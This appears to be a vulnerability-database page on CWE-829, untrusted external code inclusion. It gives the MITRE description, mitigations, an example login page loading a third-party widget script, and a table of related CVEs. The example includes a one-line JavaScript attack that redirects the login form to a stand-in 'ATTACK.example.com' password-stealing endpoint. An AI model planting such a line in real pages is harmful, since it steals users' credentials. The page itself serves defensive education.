
CWE-829 (Inclusion of Functionality from Untrusted Control Sphere) — Vulnerability Class 110

110 vulnerabilities classified as CWE-829 (Inclusion of Functionality from Untrusted Control Sphere). AI Chinese analysis included.

CWE-829 represents a critical software weakness where applications import or execute functionality from sources outside their intended control sphere, such as unverified third-party libraries or external APIs. Attackers typically exploit this vulnerability by compromising the external source or manipulating the inclusion mechanism to inject malicious code, thereby gaining unauthorized execution privileges or causing system compromise. This often occurs when developers blindly trust dependencies without verifying their integrity or origin. To mitigate this risk, developers must implement strict dependency management practices, including rigorous code review processes and the use of cryptographic signatures to verify the authenticity of included components. Additionally, employing sandboxing techniques and maintaining a minimal attack surface by removing unnecessary external dependencies can significantly reduce the likelihood of successful exploitation, ensuring that only trusted, vetted functionality is integrated into the application’s core logic.

MITRE CWE Description

The product imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere.

Common Consequences (1)

Scope: Confidentiality, Integrity, Availability
Impact: Execute Unauthorized Code or Commands
An attacker could insert malicious functionality into the program by causing the program to download code that the attacker has placed into the untrusted control sphere, such as a malicious web site. This could enable the injection of malware, information exposure by granting excessive privileges or…

Mitigations (5)

Phase: Architecture and Design
Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].

Phase: Architecture and Design
When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [REF-45] provide this capability.

Phase: Architecture and Design
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Phase: Architecture and Design, Operation
Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For ex…
Effectiveness: Limited

Phase: Architecture and Design, Operation
Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database ad…
Examples (1)

This login webpage includes a weather widget from an external website:

    <div class="header">
      Welcome!
      <div id="loginBox">
        Please Login:
        <form id="loginForm" name="loginForm" action="login.php" method="post">
          Username: <input type="text" name="username" /> <br/>
          Password: <input type="password" name="password" />
          <input type="submit" value="Login" />
        </form>
      </div>
      <div id="WeatherWidget">
        <script type="text/javascript" src="externalDomain.example.com/weatherwidget.js"></script>
      </div>
    </div>

(Bad · HTML)

The page is now only as trustworthy as externalDomain.example.com: if that site is compromised, the served widget script can be replaced with code that retargets the login form:

    ...Weather widget code....
    document.getElementById('loginForm').action = "ATTACK.example.com/stealPassword.php";

(Attack · JavaScript)
CVE ID | Title | Product | CVSS | Severity | Published
(Values marked (AI) carry the page's AI tag rather than an official score.)

CVE-2025-49809 | mtr security vulnerability | mtr | 7.8 | High | 2025-07-04
CVE-2025-32463 | Sudo security vulnerability | Sudo | 9.3 | Critical | 2025-06-30
CVE-2025-36852 | Build Cache Poisoning via Untrusted Pull Requests | Azure Based Remote Cache Plugin for Nx | 6.8 (AI) | Medium (AI) | 2025-06-10
CVE-2024-52976 | Elastic Agent Inclusion of Functionality from Untrusted Control Sphere | Elastic Agent | 4.4 | Medium | 2025-05-01
CVE-2025-20236 | Cisco Webex App Client-Side Remote Code Execution Vulnerability | Cisco Webex Teams | 8.8 | High | 2025-04-16
CVE-2024-45482 | Privilege escalation in B&R APROL | B&R APROL | 7.8 (AI) | High (AI) | 2025-03-25
CVE-2025-27607 | Python JSON Logger has a Potential RCE via missing `msgspec-python313-pre` dependency | python-json-logger | 8.8 | High | 2025-03-07
CVE-2025-24796 | Remote Code Execution within Collabora Online jail with Macros Enabled | online | 9.8 | - | 2025-03-06
CVE-2025-27510 | RCE in the package conda-forge-metadata | conda-forge-metadata | 9.8 | - | 2025-03-04
CVE-2025-0982 | Sandbox Escape in Google Cloud Application Integration's JavaScript Task (Rhino Engine) | Application Integration | 10.0 | - | 2025-02-06
CVE-2022-49038 | Synology Drive security vulnerability | Synology Drive Client | 7.8 | High | 2024-09-26
CVE-2024-43690 | Gallagher Command Centre Server security vulnerability | Command Centre Server | 8.0 | High | 2024-09-11
CVE-2024-29073 | Ankitects Anki security vulnerability | Anki | 5.3 | Medium | 2024-07-22
CVE-2024-38537 | Inclusion of Untrusted polyfill.io Code Vulnerability in fides.js | fides | - | - | 2024-07-02
CVE-2024-38476 | Apache HTTP Server may use exploitable/malicious backend application output to run local handlers via internal redirect | Apache HTTP Server | 9.1 (AI) | Critical (AI) | 2024-07-01
CVE-2024-3043 | Zigbee co-ordinator realignment packet may lead to denial of service | Ember ZNet SDK | 7.5 | High | 2024-06-27
CVE-2023-49133 | TP-LINK AC1350 security vulnerability | AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) | 8.1 | High | 2024-04-09
CVE-2023-49134 | TP-LINK AC1350 security vulnerability | AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) | 8.1 | High | 2024-04-09
CVE-2024-28184 | WeasyPrint allows the attachment of arbitrary files and URLs to a PDF | WeasyPrint | 7.4 | High | 2024-03-09
CVE-2024-24821 | Code execution and possible privilege escalation via compromised InstalledVersions.php or installed.php in Composer | composer | 8.8 | High | 2024-02-08
CVE-2022-31021 | Unlinkability broken in ursa when verifiers use malicious keys | ursa | 3.3 | Low | 2024-01-16
CVE-2023-4591 | Inclusion of Functionality from Untrusted Control Sphere in WPN-XM Serverstack | Serverstack | 7.5 | High | 2023-11-03
CVE-2023-45798 | Yettiesoft VestCert Remote Code Execution Vulnerability | VestCert | 8.4 | High | 2023-10-30
CVE-2023-5523 | M-Files Web Companion allows Remote Code Execution | Web Companion | 8.6 | High | 2023-10-20
CVE-2023-41267 | Apache HDFS Provider error message suggested installation of incorrect pip package | Apache Airflow HDFS Provider | 8.8 | - | 2023-09-14
CVE-2023-2453 | Local file Inclusion (LFI) in Forum Infusion via Directory Traversal | PHPFusion | 8.8 | High | 2023-09-05
CVE-2023-31170 | Inclusion of Functionality from Untrusted Control Sphere | SEL-5030 acSELerator QuickSet Software | 5.9 | Medium | 2023-08-31
CVE-2023-31168 | Inclusion of Functionality from Untrusted Control Sphere | SEL-5030 acSELerator QuickSet Software | 5.5 | Medium | 2023-08-31
CVE-2023-36609 | Ovarro TBox RTUs security vulnerability | TBox MS-CPU32 | 7.2 | High | 2023-07-03
CVE-2022-46302 | Remote Code Execution with Root Privileges via Broad Apache Permissions | Checkmk | 8.8 | High | 2023-04-20

Vulnerabilities classified as CWE-829 (Inclusion of Functionality from Untrusted Control Sphere) represent 110 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.